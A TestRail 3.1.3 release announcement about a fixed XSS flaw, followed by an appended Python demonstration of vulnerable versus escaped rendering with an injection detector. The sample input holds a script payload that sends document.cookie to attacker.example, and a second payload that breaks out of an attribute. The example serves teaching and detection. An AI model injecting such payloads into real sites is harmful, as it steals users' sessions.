
TestRail 3.1.3 released



Hello,

This release is a security-related update and we highly recommend that all customers upgrade to the latest version. All TestRail Hosted accounts have already been updated automatically.

What’s new in TestRail 3.1.3
Please see below for the changes of this version.

- Fixed: Invalid escaping of user-submitted strings resulting in an XSS vulnerability (project overview page, project summary report, report filters)

Based on feedback from an external security review, we have released this TestRail update that fixes an XSS (cross-site scripting) bug in TestRail. The problem would allow existing TestRail users to inject custom HTML or JavaScript into a small number of pages, and this could potentially be used to retrieve session or user information.

Please note that this issue can only be used by users who already have access to your TestRail instance.

Due to the security-sensitive nature of this update, all customers with self-hosted installations are highly encouraged to update to the new version. Please contact us in case you have any questions or need help with this.

All TestRail Hosted accounts (our cloud/SaaS edition) are already running the new version and there’s nothing TestRail Hosted customers need to do.

Updating to the new version
If you are using the download version of TestRail, you can update to the new version as usual by installing it over your existing TestRail installation (there’s no need to uninstall your existing installation). The database upgrade wizard is automatically started when you access TestRail with your web browser in case a database upgrade is needed. Please see the update instructions for details:

http://docs.gurock.com/testrail-admin/installation-upgrading/

Please take the time to make a backup of your current installation before upgrading to the new version.

Regards,
Tobias
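The bug class described in the post (user-submitted strings rendered into a page without proper escaping) is easy to reproduce outside TestRail. The following is an added example, not TestRail's own code and not derived from the fix: it renders a hypothetical project overview fragment both the vulnerable way (raw string concatenation) and the fixed way (HTML-escaping every user-controlled value in body and attribute context), and runs a small HTML-parser-based check that flags script tags and inline event handlers in the output. The template shape, the field names and the two payloads are constructed for illustration; nothing here is taken from TestRail's actual pages.

```python
import html
from html.parser import HTMLParser

# Constructed sample input: a project as a malicious, already-authenticated user
# might submit it. The payloads are illustrative, not from the advisory.
# One targets element content, the other breaks out of a quoted attribute.
MALICIOUS_PROJECT = {
    "name": 'Payments <script>document.location="https://attacker.example/?c="'
            '+document.cookie</script>',
    "announcement": '" onmouseover="alert(document.cookie)',
}


def render_overview_vulnerable(project):
    """Hypothetical 'before' rendering: user strings are concatenated verbatim,
    so markup in the project name becomes part of the page and a quote in the
    announcement terminates the title attribute and adds a new one."""
    return (
        f'<h1 class="project">{project["name"]}</h1>\n'
        f'<div class="announcement" title="{project["announcement"]}">'
        f'{project["announcement"]}</div>'
    )


def render_overview_fixed(project):
    """Same template with every user-controlled value escaped for HTML.
    quote=True also turns '"' and "'" into entities, which is what makes the
    value safe inside a double-quoted attribute, not only in element content."""
    name = html.escape(project["name"], quote=True)
    announcement = html.escape(project["announcement"], quote=True)
    return (
        f'<h1 class="project">{name}</h1>\n'
        f'<div class="announcement" title="{announcement}">'
        f'{announcement}</div>'
    )


class InjectionDetector(HTMLParser):
    """Parses rendered markup the way a browser's tokenizer would and records
    constructs a project overview page should never contain: <script> elements
    and inline event-handler attributes (on*)."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("tag:script")
        for attr_name, _value in attrs:
            if attr_name.lower().startswith("on"):
                self.findings.append(f"attr:{attr_name}")


def find_injected_script(markup):
    """Return a list of findings for the given HTML; empty means no injected
    script or handler survived rendering."""
    detector = InjectionDetector()
    detector.feed(markup)
    detector.close()
    return detector.findings


if __name__ == "__main__":
    for label, renderer in (("vulnerable", render_overview_vulnerable),
                            ("fixed", render_overview_fixed)):
        page = renderer(MALICIOUS_PROJECT)
        print(f"--- {label} ---")
        print(page)
        print("findings:", find_injected_script(page))
```

Two caveats a practitioner would want alongside this. First, escaping is context-specific: `html.escape(..., quote=True)` (the counterpart of PHP's `htmlspecialchars($s, ENT_QUOTES, 'UTF-8')` in a PHP application such as TestRail) is correct for element content and quoted attribute values, but a value placed inside a `<script>` block, a `javascript:`-capable `href`, or an unquoted attribute needs a different encoder. Second, the post's "retrieve session or user information" is the realistic impact: an `HttpOnly` session cookie stops the `document.cookie` read shown in the payload, but injected script still runs with the victim's session and can issue requests on their behalf, so output escaping, not cookie flags, is the actual fix.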